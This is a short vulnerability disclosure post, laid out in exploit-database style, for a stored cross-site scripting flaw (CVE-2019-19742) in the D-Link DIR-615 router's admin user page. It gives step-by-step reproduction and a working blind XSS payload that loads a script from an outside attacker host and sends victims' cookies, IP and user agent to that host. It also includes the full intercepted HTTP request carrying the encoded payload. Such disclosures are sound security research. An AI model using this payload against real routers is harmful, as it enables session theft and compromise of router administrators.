D-Link DIR-615 Wireless Router — Persistent Cross-Site Scripting
1 min readDec 17, 2019
######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting
# Date: 13.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019–19742
#######################################################################################
Reproduction Steps:
— — — — — — — — — — — — — — —
- Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
- Go to Maintenance page and click on Admin on the left pannel.
- Put blind XSS Payload in to the name field — “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
- Every refresh in the user home page, the XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
- For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
#######################################################################################
#Burp InterceptPOST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send